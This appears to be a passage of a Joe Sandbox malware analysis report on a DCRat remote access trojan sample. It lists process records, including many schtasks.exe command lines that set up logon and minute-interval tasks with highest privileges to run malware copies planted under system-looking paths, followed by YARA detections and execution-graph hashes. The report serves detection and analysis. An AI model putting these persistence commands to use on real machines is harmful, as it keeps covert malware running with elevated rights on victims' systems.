                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 6 /tr "'C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:10
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:11
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:12
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\RuntimeBroker.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:13
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 11 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:14
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:15
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Users\Public\Libraries\RuntimeBroker.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:16
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe"
                              Imagebase:0x820000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000010.00000002.1763313948.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: Joe Security
                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: Joe Security
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe, Author: ditekSHen
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 79%, ReversingLabs
                              Has exited:true

                              Target ID:17
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Windows NT\TableTextService\en-US\fontdrvhost.exe"
                              Imagebase:0xe00000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.1764240872.00000000030D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.1764240872.000000000310D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:true

                              Target ID:18
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:19
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Imagebase:0x780000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002EF5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002FCC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002A99000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002BD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002B3B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000003032000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002DEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002BA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002C84000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002FFD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002F93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002D24000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002B06000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002D96000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002CEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_3, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000013.00000002.4097626850.0000000002991000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 79%, ReversingLabs
                              Has exited:false

                              Target ID:20
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:21
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              Imagebase:0xb50000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000015.00000002.1764095997.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:true

                              Target ID:22
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:23
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Users\Public\Libraries\RuntimeBroker.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Users\Public\Libraries\RuntimeBroker.exe
                              Imagebase:0x8e0000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000017.00000002.1758842332.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Antivirus matches:
                              • Detection: 79%, ReversingLabs
                              Has exited:true

                              Target ID:24
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 11 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:25
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Users\Public\Libraries\RuntimeBroker.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Users\Public\Libraries\RuntimeBroker.exe
                              Imagebase:0xf00000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000019.00000002.1764234703.0000000003301000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:true

                              Target ID:26
                              Start time:04:11:53
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:27
                              Start time:04:11:54
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 11 /tr "'C:\Recovery\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:28
                              Start time:04:11:54
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 13 /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:29
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:30
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 12 /tr "'C:\Windows\Help\OEM\ContentStore\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:31
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 9 /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:32
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkT" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:33
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "jnTUlYyDyuybgXdgxhTkTj" /sc MINUTE /mo 13 /tr "'C:\Windows\Migration\WTR\jnTUlYyDyuybgXdgxhTkT.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:34
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 6 /tr "'C:\Windows\Media\WinStore.App.exe'" /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:35
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Windows\Media\WinStore.App.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:36
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 10 /tr "'C:\Windows\Media\WinStore.App.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff76f990000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:37
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZBWGzntvdU.bat"
                              Imagebase:0x7ff710a30000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:38
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:39
                              Start time:04:11:55
                              Start date:31/08/2024
                              Path:C:\Windows\System32\w32tm.exe
                              Wow64 process (32bit):false
                              Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Imagebase:0x7ff6e9430000
                              File size:108'032 bytes
                              MD5 hash:81A82132737224D324A3E8DA993E2FB5
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:40
                              Start time:04:11:56
                              Start date:31/08/2024
                              Path:C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe"
                              Imagebase:0x4f0000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000028.00000002.1774346243.00000000026A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, Author: Joe Security
                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, Author: Joe Security
                              • Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe, Author: ditekSHen
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 79%, ReversingLabs
                              Has exited:true

                              Target ID:41
                              Start time:04:11:57
                              Start date:31/08/2024
                              Path:C:\Program Files (x86)\Windows NT\Accessories\en-GB\upfc.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files (x86)\windows nt\Accessories\en-GB\upfc.exe"
                              Imagebase:0xaa0000
                              File size:323'072 bytes
                              MD5 hash:ED9312F79BD3E7F4BEB41E56EA82512E
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000029.00000002.1774197474.0000000002BC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              Has exited:true


                                Execution Graph

                                Execution Coverage:15%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:3
                                Total number of Limit Nodes:0
                                execution_graph 5976 7ffd9b8aa735 5979 7ffd9b8aa74f QueryFullProcessImageNameA 5976->5979 5978 7ffd9b8aa9f5 5979->5978

                                Control-flow Graph

                                Memory Dump Source
                                • Source File: 00000000.00000002.1674691713.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b8a0000_dmhu7oz5yP.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4a95f545e1bc21e77736daf551353447192d96f5dfafe2837c141bfad85dd8d2
                                • Instruction ID: c31e21bb62582ce294dc44216812f730c563ef3392446c31b38c648865419ab0
                                • Opcode Fuzzy Hash: 4a95f545e1bc21e77736daf551353447192d96f5dfafe2837c141bfad85dd8d2
                                • Instruction Fuzzy Hash: 76323F70A19A8D8FDBB8EF68C865BE937E1FF59311F10412AD84DC72A1DB749640CB81

                                Control-flow Graph

                                Memory Dump Source
                                • Source File: 00000000.00000002.1674691713.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b8a0000_dmhu7oz5yP.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c50d3ee8c0a820dfb09d9e7bfb17bf9f3bd996b66c81da4b2cabe717998e48f
                                • Instruction ID: 44182ced8b75344f0490f87abbe152a3092ad8e4c7429b6058e6866343ba5461
                                • Opcode Fuzzy Hash: 1c50d3ee8c0a820dfb09d9e7bfb17bf9f3bd996b66c81da4b2cabe717998e48f
                                • Instruction Fuzzy Hash: 4342D670E1962D8FDBA8DF68C8A0BEDB7B1FF58301F5041A9D04DA7295DA346A81CF50

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1674691713.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b8a0000_dmhu7oz5yP.jbxd
                                Similarity
                                • API ID: FullImageNameProcessQuery
                                • String ID:
                                • API String ID: 3578328331-0
                                • Opcode ID: 26b9119e16b42740e5b911012f4e2ea18bbf5fd446d72ee8effba528ca788a1f
                                • Instruction ID: e80fdad7fafa34d7e0ff696d08f46fc9e97bb05f6d3611fbaa4b247dbca00e03
                                • Opcode Fuzzy Hash: 26b9119e16b42740e5b911012f4e2ea18bbf5fd446d72ee8effba528ca788a1f
                                • Instruction Fuzzy Hash: 0BB15D30618A8D8FEB78DF58C855BE837E1FB59301F10412ED84ECB691DB74AA81CB91
                                Memory Dump Source
                                • Source File: 00000000.00000002.1674691713.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b8a0000_dmhu7oz5yP.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 144ae31fb1c87f6e6da8a95771764cb27e516cb66c76042418d5faedc721fe5d
                                • Instruction ID: 33936ab22b8a17ed44ee2c77b837c91ac2a96ad609f7d023a3458f259dd710ed
                                • Opcode Fuzzy Hash: 144ae31fb1c87f6e6da8a95771764cb27e516cb66c76042418d5faedc721fe5d
                                • Instruction Fuzzy Hash: E2322F70A19A8D8FDBB8EF28C855BE937E1FF59301F10416AD84ECB6A1DB745640CB41
                                Memory Dump Source
                                • Source File: 00000000.00000002.1674691713.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b8a0000_dmhu7oz5yP.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
